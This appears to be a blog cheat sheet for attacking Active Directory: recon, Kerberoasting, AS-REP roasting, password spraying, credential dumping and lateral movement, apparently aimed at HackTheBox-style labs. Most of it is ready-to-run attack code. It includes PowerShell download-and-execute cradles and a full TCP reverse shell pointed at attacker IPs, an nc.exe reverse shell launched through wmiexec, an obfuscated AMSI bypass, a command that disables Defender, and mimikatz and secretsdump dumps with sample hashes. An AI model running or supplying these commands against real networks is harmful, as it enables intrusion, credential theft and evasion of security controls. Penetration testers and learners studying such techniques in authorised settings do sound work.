Skip to main content

AD PenTest - Recon and Initial Access

Use PowerSploit/PrivEsc/Powerup.ps1 to find some potential info

check for Non-windows processes in windows using netstat

Step 1: Check net user and admin and user rights

Step 2: Check if we have access of powershell if yes then run powerup.ps1,sherlock.ps1 and JAWS.ps1.

Step 3: Try to get Meterpreter.

Step 4: Load mimikatz,try bypass UAC, check SAM SYSTEM etc.

Step 5: check for weird programs and registry.

Step 6:
If the box is Domain Controller - Enum - Enum SMB Users/Ldap Users/ Blood Hound - GUI AD Enum & Kerberos Enum - Bruteforce  Atacking AD with LDAP & kerberos  
 
Step 7:
Got Creds - try psexec.py or crackmapexec - cheatsheet

 

Download rev Shells on the target 

#download and execute the script

powershell.exe -c iex(new-object system.net.webclient).downloadstring('http://10.10.10.10/powerrev.ps1')

#Run the shell in memory
powershell.exe iex(invoke-webrequest("http://10.10.10.10:8001/powerrev.ps1") -UseBasicParsing))

powershell.exe iex(iwr(http://10.10.10.10:8001/powerrev.ps1) -usebasicparsing)

#download the rev shell on the target and save it
powershell.exe Invoke-WebRequest http://10.10.10.10/powerrev.ps1 -OutFile c:\temp\powerrev.ps1
powershell.exe c:\temp\powerrev.ps1

#Another way of downloading a file
powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/ipw.ps1')"

# Download and execute Automatically
echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') | powershell -noprofile -

#Powershell V3
powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.2.0.5/shell.ps1')|iex"
iex (iwr '10.10.14.9:8000/ipw.ps1')


$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','http://10.10.14.9:8000/ipw.ps1',$false);$h.send();iex $h.responseText
$wr = [System.NET.WebRequest]::Create("http://10.10.14.9:8000/ipw.ps1") $r = $wr.GetResponse() IEX ([System.IO.StreamReader]($r.GetResponseStream())).ReadToEnd()


More Info from Hacktrcks.xyz
Powershell Revere Shells

powershell -nop -c $client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',5985);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

try the shell from this link
Local user Enum Using Net user 

whoami /priv

whoami /groups

net user UserName /domain

net localgroup "Remote Management Users"
Basic AD Enum After Initial Access using AD Module

#
Get Domain Details
$ADClass = [System.DirectoryServices.ActiveDirectory.Domain]
$ADclass::GetCurrentDomain()


#Loading AD Modules
Import-Module Microsoft.ActiveDirectory.Management.dll -Verbose
Import-Module ActiveDirectory.psd1
-Verbose

User Enumeration

#View all users in Domain
get-aduser

#View all user properties
get-aduser -Identity kyomah -Properties *

#ALL user Objects

Get-ADUser -Filter * -Properties * |select -First 1 | Get-Member -MemberType *Property | select Name

#Find Last Password set date

Get-ADUser -Filter * -Properties * |select name, @{expression={[datetime]::fromFileTime($_pwdlsatset)}}

#View Account Descriptions to check for stored passwords
Get-ADUser -Filter 'Description -like "*pass*"' -Properties Description | select name,Description

#Finding user accounts used as Service accounts
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName


Computer Enumeration

#view all computer names
Get-ADComputer -Filter * | select name

#Find Windows 2012 Servers
Get-ADComputer -Filter 'OperatingSystem -like "*2019*"' -Properties OperatingSystem | select Name,OperatingSystem

#Check if machines is online/pingable
Get-ADComputer -Filter * -Properties DNSHostName |%{Test-Connection -Count 1 -ComputerName $_.DNSHostName}

User Groups Enumeration

#Find all groups in the Domain
Get-ADGroup -Filter * |select name

#Get verbose info about groups
Get-ADGroup -Filter * -Properties *

#Find Complete info about specific group

Get-ADGroup -Identity 'Enterprise Admins' -Properties *
Get-ADGroup -Filter 'Name -like "*admin*"'| select Name

Group Membership Enum

#Find the members of a group
Get-ADGroupMember -Identity 'Enterprise Admins' -Recursive | select SamAccountName

#Find the groups a user is member of

Get-ADPrincipalGroupMembership -Identity UserName | select name

GPO Enumeration:

#Get GPO list in current domain

Get-gpo -all

#Restricted policy
Get-NetGPOGroup

#Finding OUS
Get-ADOrganizationalUnit -Filter * -Properties *

Forest Enumeration

#Domain Trust Mapping

Get-ADTrust -Identity steins.local

#Forest Details
Get-ADForest
Get-AdForest -Identity Steins.local

#Get all domains in current forest

(Get-ADForest).Domains

#Get all Global catalogs for current forest

Get-ADForest | select -ExpandProperty GlobalCatalogs

#Map Trusts of Forests

Get-ADTrust -Filter 'msDS-TrustForestTrustinfo -ne "$null"'



Basic AD Enum After Initial Access using PowerView

powershell.exe -ep bypass
Import-Module ./PowerView.ps1

#View all the computers in the domain
Get-DomainComputer | Select name

#List the users in the domain
Get-DomainUser

#View all the shares of the comupters
Find-DomainShare
Invoke-ShareFinder -Verbose -ExcludeStandard -ExcludePrint -ExcludeIPC
Get-NetfileServer --help

#List all groups on a machine:
Get-netlocalgroup -ComputerName steinsdc -ListGroups

#Find Computers where Domain admin (user/group) has sessions
Invoke-UserHunter -GroupName "RDPUsers"

#Find Computers where domain admin is logged in
Invoke-UserHunter -Stealth

#Finding user accounts used as Service accounts
Get-NetUser -SPN
Finding machines with local admin access

incase SMB is disbaled, you can run the below https://jdhitsolutions.com/blog/wp-content/uploads/2011/07/get-wmiadmin.txt --> import the script


Find-WMILocalAdminAccess -ComputerFile ./computers.txt -Verbose

Find-WMILocalAdminAccess -ComputerName starkt

Ldap Enumeration:

ldapsearch -x -h 10.10.10.10 -s base namingcontexts 

ldapsearch -x -h forest.htb.local -s sub -b 'DC=HTB,DC=LOCAL' | tee ldap_dump.txt


Dumping passwords using LDAP:

ldapsearch -x -h forest.htb.local -b 'DC=HTB,DC=LOCAL' "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd

ldapsearch -x -h 10.10.10.254 -D <<username>> -w <<password>> -b "dc=AJLAB,dc=COM" "(ms-MCS-AdmPwd=*)" ms-MSC-AdmPwd
Domain Enumeration with RPcclient

#Enum using Null Session
rpcclient -U "" 10.10.10.10

#Login as a user

rpcclient -U USERNAME //10.10.10.10 #Find Users in the domain rpcclient -Uuser_Name%PASSWORD -c enumdomusers 10.10.10.10 #Find Domian Info rpcclient -Uuser_Name%PASSWORD -c querydominfo 10.10.10.10 #Find Groups and their Alias rpcclient -Uuser_Name%PASSWORD -c "enumalsgroups builtin" 10.10.10.10 #Find more info using Alias and note SIDs rpcclient -Uuser_Name%PASSWORD -c "queryaliasmem builtin 0x244" 10.10.10.10 #Find more info using SIDs rpcclient $> lookupsids S-1-5-21-586154515854-343543654-8743952433-1105

#Reset other Users Password
rpcclient -U user1 //10.10.10.10
setuserinfo2 USER2 23 'PASSWORD'

Enum using RPCClient


rpcclient -U DOMAIN\\Username 10.10.10.10 #Enter pass

enumdomusers #Enumerate Domain Users

lookupnames username #Get user S-ID

queryuser user_id #Example queryuser 0x1f2

querydispinfo #Display users info

enumprivs        #Enum Privileges

enumprinters    #Enum Printers
Creds Sniffing when SMB Signing is not required/ Disbaled 

responder -I tun0 -F --lm -d -w -i KALI_IP

net use \\10.10.14.239 #on target machine

or

Access SMB

OR
responder -I tun0 -rPv

#NTLMv2 Hash
hashcat -m 5600 hash ~/Downloads/rockyou.txt --force -r /usr/share/hashcat/rules/d3ad0ne.rule

Find users with SPN's set to their Accounts

#import the module and Find the users
Import-Module .\GetUserSPNs.ps1

or
#AD module
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName

or
#Poweview
Get-NetUser -SPN

#request the users ticket

powershell.exe -exec bypass -c "Add-Type -AssemblyName System.IdentityModel; New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList 'SPNNAME/hostname.steins.LOCAL:1433' "

Import-Module .\Invoke-Kerberoast.ps1

#Generate the hash
Invoke-Kerberoast -OutputFormat Hashcat

#Cracking the hash
hashcat -m 13100 -a 0 ticket.hashcat /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/T0XlC-insert_space_and_special_0_F.rule --force

or

hashcat -a 0 -m 13100
ticket.hashcat /usr/share/wordlists/rockyou.txt -r/usr/share/hashcat/rules/d3ad0ne.rule --force

or

hashcat -a 0 -m 13100 hash ~/Downloads/Tools/rockyou.txt -r /usr/share/hashcat/rules/InsidePro-PasswordsPro.rule --force

List the users with SPN Set

sudo GetUserSPNs.py -request -dc-ip 10.10.10.10 Steins.local/mark  GetUserSPNs.py -request -dc-ip 10.10.10.10 Steins.local/mark 
-outputfile hashes.txt -k You can Review the Errors here: KRB_AP_ERR_BAD_INTEGRITY The authenticator was encrypted with something other than the session key. The result is that the client cannot decrypt the resulting message. The modification of the message could be the result of an attack or it could be because of network noise. #Create ccache file getTGT.py -dc-ip 10.10.10.10 Steins.local/mark export KRB5CCNAME=mark.ccache
Brute Forcing Kerberos

kerbrute userenum --dc 10.10.10.10 -d steins.local users.txt 

Download Kerbrute from here
kerbrute userenum --domain htb.local /usr/share/SecLists/Usernames/xato-net-10-million-usernames.txt --dc 10.10.10.10 
 
ASREP Roast: Get users hash from a DoNotPre-Auth user

sudo GetNPUsers.py STEINS-DC.LOCAL/ -usersfile users.txt -outputfile hashes.txt -dc-ip 10.10.10.10

sudo john hash --format=krb5asrep --wordlist=rockyou.txt 
# better copy rockyou.txt to the same location  
ASREP Roast as an Authenticated user

python3 GetNPUsers.py steins.local/user:"password!" -dc-ip 10.10.10.10 -request
 
Updating Time to Match DC - KRB_AP_ERR_SKEW(Clock skew too great)

#Display the time of the server
proxychains net time -S 10.10.10.10

or

#Get DC time from curl response headers
proxychains curl DC_IP:5985 -v

sudo date -s "Thu Dec 24
10.10.10.10"
Kerberoasting

.\Rubeus.exe kerberoast /domain:steins.local /user:username/format:hashcat /outfile:hash.txt

hashcat -m 13100 krb5t_hash /home/kali/Downloads/Tools/rockyou.txt --force  
Kerberoast:
 
Save the TGS to the disk and brute force it :P. DC identifies the service account by ServicePrincipalName but service accounts password are freaking hard to crack in most of the cases.


Finding user accounts used as Service accounts: List SPNs

Poweview: Get-NetUser -SPN
AD: Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName


Request a Ticket: TGS: Take the SPN Name from above command

#AD Module - get TGS
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosReceiverSecurityToken -ArgumentList "SPN_NAME/Steins.local"

#Check tokens and confirm the TGS
klist

#Saves the tickets from memory to DISK
Invoke-Mimikatz -Command '"Kerberos::list /export"'

#PowerView: supports JTR & hashcat
Request-SPNTicket

Old way to cracking kerberos password
python tgscrack.py wordlist.txt hash_fileName


OR

# Requesting TGS (Ticket Granting Service)
GetUserSPNs.py steins.local/kyomah:Welcome@1 -dc-ip 192.168.227.144 -request

#Cracking Kerberos 5 TGS using hashcat
hashcat -m 13100 krb5t_hash /home/kali/Downloads/Tools/rockyou.txt --force 
 
Targeted Kerberosting - AS-REPs

powerview.ps1 Get-DomainUser -PreauthNotRequired -Verbose

Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuths


OR CHECK FOR users on which we can modify ACL
---------------------------------------------- Searching for GenericAll Rights

#Finding Users with enough persmissions to modify acls
powerview_dev.ps1 Invoke-ACLScanner -ResolveGUIds | {$_.IdentityReferenceName -match "RDPUsers"}

#Changing the ACL of the user: Disabling PreAuth for Kerberos
Powerview.exe Set-DomainObject -Identity USER_NAME -XOR @{useraccountcontrol=4194304} -Verbose

#Now we should be able to view users for preatuth is required:
Powerview.exe Get-DomainUser -PreAuthNotRequired -Verbose

#Requesting AS-REP for offline bruteforcing:
https://raw.githubusercontent.com/HarmJ0y/ASREPRoast/master/ASREPRoast.ps1 (Depricated)
Get-ASREPhash -Username USER_NAME -Verbose

OR
#use Asreproast to get the hash of the user account, remove all the spaces from the hash before bruteforcing
https://github.com/GhostPack/Rubeus#asreproast
Rubeus.exe asreproast /user:TestOU3user
OR
Rubeus.exe asreproast /user:Administrator /format:hashcat /outfile:hash.txt

#Copy the hash and crack it using JTR hashcat
john krbhash --wordlist=wordlist.txt
 

#Cracking using Hashcat; add $23 after
$krb5asrep if you do not export the hash as hashcat format
hashcat -m18200 hash -a 3 rockyou.txt
hashcat -m18200 hash rockyou.txt -r /usr/share/hashcat/rules/d3ad0ne.rule --force
Abusing Kerberos with users who doenst have SPNs
------------------------------------------------
- Set SPN for the user and request TGS

#searching for users with GenericAll Permissions Set
powerview.exe Invoke-ACLScanner -ResolveGUIds | {$_.IdentityReferenceName -match "RDPUsers"}

#Find the user who doesnt have SPN set already using AD module:
Get-ADUser -Identity USER_Name -Properties ServicePrincipalName | Select ServicePrincipalName

#Set a SPN for the User (Must be Unique for the domain)
powerview.exe Set-DomainObject -Identity USER_NAME -Set @{serviceprincialName = 'DomainName/SomeUniqueName'}
AD: Set-ADUser -Identity USER_NAME -ServicePrincipalNames @{Add='DomainName/SomeUniqueName'}

#Now if you check you should see SPN Set to the username
Get-ADUser -Identity USER_Name -Properties ServicePrincipalName | Select ServicePrincipalName

Now request a TGS:
---------------------
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosReceiverSecurityToken -ArgumentList DomainName/SomeUniqueName"

#check the TGS for DomainName/SomeUniqueName
klist

#Export the tickets
Invoke-Mimikatz -Command '"kerberos::list /export"'

#Crack the TGS
python tgscrack.py wordlist.txt hash_fileName

Log generated is 4769

BloodHound-Python
If you have access to DC, need admin creds - Github

Linux:


proxychains python3 bloodhound.py -d Steins.local -u admin -p p@$$W0rd! -c all -dc dc.steins.local -gc dc.steins.local -v -ns 10.10.10.10 --dns-tcp

Few files will appear in the same location, import them into bloodhound

Kali: apt-get install bloodhound
sudo neo4j console
go to localhost:7474
neo4j: neo4j #login in browser and change the password

bloodhound #bloodhoun login will pop-up, login with new creds

Windows:


Download this on Windows target: SharpHound.ps1


powershell -ep bypass
..\SharpHound.ps1
invoke-Bloodhound -CollectionMethod All -Domain Steins.local -ZipfileName file.zip

invoke-Bloodhound -CollectionMethod LoggedOn -Verbose

or

SharpHound.exe -c All -d Steins.local --zipfilename test.zip

OR
.\SharpHound.exe -d steins.local --domaincontroller 192.168.168.168 --ldapusername admin --ldappassword P@$$W0rd! --zipfilename domain.zip - c All

open the file in bloodhound --> click on upload --> select file


For Testing:

git clone https://github.com/BloodHoundAD/BloodHound-Tools
cd DBCreator
pip install neo4j-driver
sudo pip3 install neo4j
python3 DBCreator.py
sudo neo4j console
dbconfig
Access other user's share 

net use \\DC.STEINS.LOCAL\c$ /u:STEINS.LOCAL\admin 'P@$$W0rd!'

or


$SecPassword = ConvertTo-SecureString 'ADMIN_PASSWORD' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('Domain\Admin_Username', $SecPassword)


invoke-command -computername dc -scriptblock { dir C:\users\username\desktop } -credential $cred
Add a user to another group

Powerview:

$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)

Add-DomainGroupMember -Identity 'Domain Admins' -Members 'harmj0y' -Credential $Cred

Windows:
net group "Remote Admin Permissions" USERNAME /add /domain
Disable AntiVirus/ Windows Defender

Set-MpPreference -DisableRealtimeMonitoring $true

Diasble AMSI 

sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
Adding DoNotPre-Auth on target user

works only after logging in

Set-ADAccountControl -Identity jorden -doesnotrequirepreauth $true
Password Spraying 

Import-Module PowerView.ps1

#list all domain users and save them to a text file
PowerShell Get-DomainUser | select samaccountname

Import-Module DomainPasswordSpray.ps1

Invoke-DomainPasswordSpray -UserList users.txt -Password 'P@$$W0rd!' -OutFile sprayed-creds.txt

or


proxychains crackmapexec smb 10.10.10.10 -d steins.local -u users.txt -p 'p@$$w0rd1' --continue-on-success
Get User Account Details 

net user UserName /domain

or

PowerShell Get-DomainUser UserName
Open a Shell using creds: if Port 5985 is open

sudo evil-winrm -u USERNAME -p PASSWORD -i 10.10.10.10

or

evil-winrm -u username -H 9658d1d1dcd9250115e2205d9f48400d -i 10.10.10.10
or psexec.py USERNAME@10.10.10.10 or sudo secretsdump.py USERNAME@10.10.10.10 OR login to the machine and ./mimikatz.exe "lsadump::dcsync /user:Administrator" "exit"; or
evil-winrm -i 10.10.10.10 -u administrator -p aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6

or
wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6 steins.local/administrator@10.10.10.10

or


.\SharpDPAPI.exe machinecredentials psexec.py Administrator@10.10.10.10 -hashes LMHASH:NTHASH
Cracking Passwords using ntds & system hive

secretsdump.py -ntds ntds.dit -system system.bak LOCAL

#login as Admin using the hash
evil-winrm -H 9658dsa3t1d9250115e2205d9f48400d -u administrator -i 10.10.10.10

#For Clear Text Password

lsassy -d steins.local -u Administrator -H 9658dsa3t1d9250115e2205d9f48400d 10.10.10.10 -m 0 --procdump procdump.exe --dumpert dumpert.exe

#Download the hashes dump

secretsdump.py -just-dc-ntlm STEINS.LOCAL/administrator:"Password!"@10.10.10.10 -use-vss
Dumping Creds if you find lsass.dmp

mimikatz.exe
sekurlsa::minidump lsass.DMP
sekurlsa::logonPasswords full
Writable Directories 
save exploits in below directories.

C:\Windows\System32\spool\drivers\color\
Running a Powershell Script on Target Machine 

http://website.com/cmd.php?cmd=echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.33/pu.ps1')| powershell -noprofile - 
RCE using wmiexec

proxychains wmiexec.py -debug -nooutput domain/username:'password'@TARGET_ip "powershell.exe Invoke-WebRequest -Uri 'http://KALI_ip/nc.exe' -OutFile 'C:\Windows\System32\spool\drivers\color\nc.exe'; cmd.exe /c C:\Windows\System32\spool\drivers\color\nc.exe -e cmd.exe KALI_IP 9001"
Port Scan a Target Machine 

Download Invoke-PortScan from here

PowerShell Invoke-Portscan -Hosts 172.16.249.1/24 -Ports 22 -Threads 30
| Where { $_.Alive -eq "True" }
Enumerating AD Recycle Bin Group

Get-ADObject -filter 'isDeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects

#Now check for users passwords. might come in handy sometimes
Get-ADObject -filter { SAMAccountName -eq "UserName" } -includeDeletedObjects -property *









Comments

Popular posts from this blog

SQL DB & SQL Injection Pentest Cheat Sheet

1) MSSQL Injection Cheat Sheet | pentestmonkey 2) xp_cmdshell | Red Team tales 3) PentesterMonkey SQL Injection Cheatsheet Use dbeaver for GUI Access 4) SQL Injection Explanation | Graceful Security Common Ports Microsoft SQL: 1433/TCP (default listener) 1434/UDP (browser service) 4022/TCP (service broker) 5022/TCP (AlwaysOn High Availability default) 135/TCP (Transaction SQL Debugger) 2383/TCP (Analysis Services) 2382/TCP (SQL Server Browser Service) 500,4500/UDP (IPSec) 137-138/UDP (NetBios / CIFS) 139/TCP (NetBios CIFS) 445/TCP (CIFS) Oracle SQL: 1521/TCP 1630/TCP 3938/HTTP MongoDB : 27017,27018,27019/TCP PostgreSQL: 8432/TCP MySQL: 3306/TCP SQL DB Enum with nmap: nmap -p 1433 —script ms-sql-info —script-args mssql.instance-port=1433 IP_ADDRESS nmap -Pn -n -sS —script=ms-sql-xp-cmdshell.nse IP_ADDRESS -p1433 —script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net user bhanu bhanu123 /add" nmap -Pn -n -sS —script=ms-sql-xp-cmds

Windows Priv Escallation

1.     Windows Privilege Escalation Commands  _ new 2.     Transferring Files to Windows 3.    Priv Esc Commands 4.    Priv Esc Guide  5.    Payload All the Things --> great Coverage 6.    WinRM -- Windows Priv Esc    7. Newb Guide - Windows Pentest    8. Kerberos Attacks Explained     9. How to Attack Kerberos 101    Use PowerSploit/PrivEsc/Powerup.ps1 to find some potential info check for Non-windows processes in windows using netstat Step 1: Check net user and admin and user rights Step 2: Check if we have access of powershell if yes then run powerup.ps1,sherlock.ps1 and JAWS.ps1. Step 3: Try to get Meterpreter. Step 4: Load mimikatz ,try bypass UAC , check SAM SYSTEM etc. Step 5: check for weird programs and registry. Step 6: If the box is Domain Controller - Enum - Enum SMB Users/Ldap Users/ Blood Hound - GUI AD Enum & Kerberos Enum - Bruteforce   Atacking AD with LDAP & kerberos      Step 7: Got Creds - try psexec.py or crackm

Forensics & Crypto

Online Decoder --> https://2cyr.com/decode/ Encoding errors -->  https://ftfy.now.sh/ File Signatures List -->  Click here PCAP Analysis: -->  https://www.packettotal.com/ Online Cipher Decryptors: CyberChef  - Cipher Decoder   Crack Station-Hash Cracke r Decrypt Any Kind of Hash 1)  Cipher Statistics 2)  Index of Coincidence Calculator - Online IC Cryptanalysis Tool 3)  Tools List (Awesome and Fantastic Tools) Available on dCode 4)  Solve an Aristocrat or Patristocrat 5)  RSA attack tool (mainly for ctf) - retreive private key from weak public key and/or uncipher data 5-1)  RSA - Find PQ using N 6)  BertNase's Own Hide content in a Image made of blocks - npiet fun! 7)  Vigenere Solver - www.guballa.de 8)  Fernet (Decode) 9)  Unicode Text Steganography Encoders/Decoders 10)  All in ONE encoders and Decoders Tool 11) Cryptii - Decoder Image Forensics: 1)  Forensically, free online photo forensics tools - 29a.ch 2)  StegSolve to decryt data in